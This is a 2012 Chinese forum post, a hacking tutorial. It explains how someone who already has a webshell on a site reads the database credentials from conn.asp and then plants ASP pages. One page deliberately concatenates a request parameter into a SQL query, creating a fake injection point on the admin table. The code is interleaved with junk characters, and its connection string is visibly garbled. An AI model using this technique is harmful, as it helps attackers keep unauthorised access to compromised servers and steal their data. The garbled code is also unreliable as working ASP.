首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表。因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
8 M# t+ x& x& ~ASP/Visual Basic代码! `0 j) {$ e& ?+ _2 m- l
<!--#include file="xx.asp"--> ( R( Q* e2 z5 ]2 _# ` o8 f- O4 c
<% . x9 C1 I% N8 @- W' e' T+ k9 ]
set rs=server.createobject("ADODB.recordset")
6 F7 Q2 @- B3 W" rid = request("id") . n5 G5 L* K$ F: q8 X5 J
strSQL = "select * from admin where id=" & id ' j8 _ ]# `6 A
rs.open strSQL,conn,1,3 6 v; e/ E1 `8 `+ E& `: n
rs.close
4 A4 t2 I8 _" H%> 5 E y4 F! V+ Y, e4 ?- {) m
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
4 f. ]+ L9 q! v然后就要构造一个连接数据库的文件了,代码如下:
/ C0 J6 [" G- `) AASP/Visual Basic代码
$ p- Y( o" E7 x7 p% v- E5 O4 F<% , ?6 K! M' @4 E
strSQLServerName = "000.000.000.000" '服务器名称或地址 ; l1 z/ e. [" {! K- [
strSQLDBUserName = "sqlname" '数据库帐号 : `7 M' ~- f2 D
strSQLDBPassword = "sqlpass" '数据库密码 1 o! c. ?6 o" P+ w9 M0 w2 g
strSQLDBName = "sqldataname" '数据库名称 8 Y0 h8 C) j& ] a
Set conn = Server.CreateObject("ADODB.Connection")
0 r0 q& b2 s2 o% g$ f; @strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";" & w3 {" o$ c0 B0 |/ A
conn.open strCon
+ B$ \7 J, B1 ~, g5 A8 b6 Y%> 7 i: i. f" d: T4 J
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。就这样,正常情况下,就OK了,伪造成功) R' M4 R8 r$ f; S3 [* p
|
发表于 2012-9-13 17:53:08
收藏
支持
反对